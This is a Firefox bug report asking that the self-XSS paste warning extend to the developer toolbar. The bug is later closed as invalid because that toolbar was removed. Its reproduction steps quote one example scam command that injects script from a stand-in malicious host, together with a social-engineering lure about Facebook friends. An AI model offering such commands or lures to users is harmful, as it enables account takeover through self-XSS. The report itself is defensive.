Closed Bug 1319381 Opened 4 years ago Closed 2 years ago

The paste/dnd selfxss warning should also apply to the developer toolbar

Categories

(DevTools Graveyard :: Graphic Commandline and Toolbar, defect, P2)

defect

Tracking

(Not tracked)

RESOLVED INVALID

People

(Reporter: Gijs, Unassigned)

References

Details

(Keywords: sec-want)

STR:

1. tell user to copy/paste "inject 'http://malicious.com/foo.js'" into the GCLI to see people who unfriended them / what their facebook friends really think about them / etc.


ER:
nopenopenopenopenope

AR:
we just let it happen
See Also: → 1319382
I think a fix for bug 1319382 would probably work here too.
Product: Firefox → DevTools
GCLI is going away with Firefox 62 (see bug 1461970). So there isn't a way to inject JS anymore in the way described here.
Status: NEW → RESOLVED
Closed: 2 years ago
Resolution: --- → INVALID
Product: DevTools → DevTools Graveyard
Group: firefox-core-security
You need to log in before you can comment on or make changes to this bug.